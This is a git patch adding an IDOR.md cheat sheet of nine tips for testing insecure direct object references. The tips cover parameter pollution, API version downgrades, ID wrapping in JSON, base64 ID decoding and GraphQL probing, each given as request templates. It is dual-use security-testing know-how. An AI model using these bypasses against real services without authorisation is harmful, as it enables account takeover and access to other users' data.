From 233ec1f5b72071acc98227c1c4bf98fb63bd6ef1 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+MD15@users.noreply.github.com>
Date: Fri, 4 Sep 2020 17:41:20 +0700
Subject: [PATCH] Account Takeover [1]

Create account IDOR (Insecure direct object references) tips and add 9 tips
---
 IDOR.md | 99 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 99 insertions(+)
 create mode 100644 IDOR.md

diff --git a/IDOR.md b/IDOR.md
new file mode 100644
index 0000000..99e246e
--- /dev/null
+++ b/IDOR.md
@@ -0,0 +1,99 @@
+## IDOR (Insecure Direct Object Reference)
+
+1. Add parameters onto the endpoints for example, if there was
+```html
+GET /api/v1/getuser
+[...]
+```
+Try this to bypass
+```html
+GET /api/v1/getuser?id=1234
+[...]
+```
+
+2. HTTP Parameter pollution
+
+```html
+POST /api/get_profile
+[...]
+user_id=hacker_id&user_id=victim_id
+```
+
+3. Add .json to the endpoint
+
+```html
+GET /v2/GetData/1234
+[...]
+```
+Try this to bypass
+```html
+GET /v2/GetData/1234.json
+[...]
+```
+
+4. Test on outdated API Versions
+
+```html
+POST /v2/GetData
+[...]
+id=123
+```
+Try this to bypass
+```html
+POST /v1/GetData
+[...]
+id=123
+```
+
+5. Wrap the ID with an array.
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":111}
+```
+Try this to bypass
+```html
+POST /api/get_profile
+[...]
+{"id":[111]}
+```
+
+6. Wrap the ID with a JSON object
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":111}
+```
+Try this to bypass
+```html
+POST /api/get_profile
+[...]
+{"user_id":{"user_id":111}}
+```
+
+7. JSON Parameter Pollution
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":"hacker_id","user_id":"victim_id"}
+```
+
+8. Try decode the ID, if the ID encoded using md5,base64,etc
+```html
+GET /GetUser/dmljdGltQG1haWwuY29t
+[...]
+```
+dmljdGltQG1haWwuY29t => victim@mail.com
+
+9. If the website using graphql, try to find IDOR using graphql!
+```html
+GET /graphql
+[...]
+```
+```html
+GET /graphql.php?query=
+[...]
+```